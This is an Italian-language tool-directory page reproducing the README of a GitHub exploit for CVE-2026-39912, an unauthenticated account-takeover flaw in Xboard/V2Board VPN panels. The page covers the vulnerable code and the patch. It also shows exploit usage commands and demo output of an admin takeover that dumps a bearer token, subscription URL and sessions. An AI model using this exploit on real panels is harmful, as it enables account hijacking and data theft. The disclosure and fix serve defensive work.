Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39912 — Xboard / V2Board - Acquisizione non autenticata di account - Perdita del token Magic Link (CVE-2026-39912) | Kitploit
Strumenti/GitHubGitHub/chocapikk/cve-2026-39912
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingAutenticazione
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board - Acquisizione non autenticata di account - Perdita del token Magic Link (CVE-2026-39912)

Vedi Repository
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2026-39912 - Xboard / V2Board Account Takeover non autenticato

Fuga del token del link magico in loginWithMailLink

CVECVE-2026-39912
CVSS9.1 (Critical)
CWECWE-201 (Insertion of Sensitive Information Into Sent Data)
InteressatiV2Board >= 1.6.1 through 1.7.4 / Xboard all versions through 0.1.9+
CorrettoNon ancora (V2Board abbandonato da giugno 2023)
Divulgato2026-04-09
CreditiValentin Lobstein (Chocapikk)
Writeupchocapikk.com
PR di fixV2Board #981 / Xboard #873

TL;DR

L'endpoint loginWithMailLink restituisce il link di login magico direttamente nel corpo della risposta HTTP invece di inviarlo solo via email. Un attaccante non autenticato che conosce un'email registrata può compromettere qualsiasi account - incluso quello admin - con due richieste HTTP.

Software Interessato

  • V2Board - Pannello di gestione open-source per protocolli proxy (8.7k stelle, abbandonato)
  • Xboard - Fork di V2Board (4k+ stelle, attivamente mantenuto)

Entrambi sono pannelli VPN/proxy ampiamente diffusi, principalmente in Cina. ZoomEye mostra oltre 7.000 istanze esposte su internet.

Requisiti

  • login_with_mail_link_enable deve essere abilitato nelle impostazioni di amministrazione (non abilitato di default)
  • Un indirizzo email registrato valido

Utilizzo

root@kitploit:~
# Install dependencies
pip install requests

# Account takeover + data dump
python3 exploit.py http://target:7001 [email protected]

# Save dump to file
python3 exploit.py http://target:7001 [email protected] -o dump.json

Demo

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min from git clone to is_admin: true

[INFO] Requesting magic link for [email protected]
[INFO] Leaked: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Authenticated (admin=True)
[INFO] User Info: OK
[INFO] Subscription: OK
[INFO] Active Sessions: OK
[INFO] Stats: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

Il Bug

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // Token leaked to caller
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Same bug, inherited from fork

La Correzione

root@kitploit:~
- return [true, $link];
+ return [true, true];

Riferimenti

  • V2Board - Codice vulnerabile (riga 71)
  • Xboard - Codice vulnerabile (riga 49)
  • Commit originale che ha introdotto il bug (2022-06-27)
Scarica lo strumento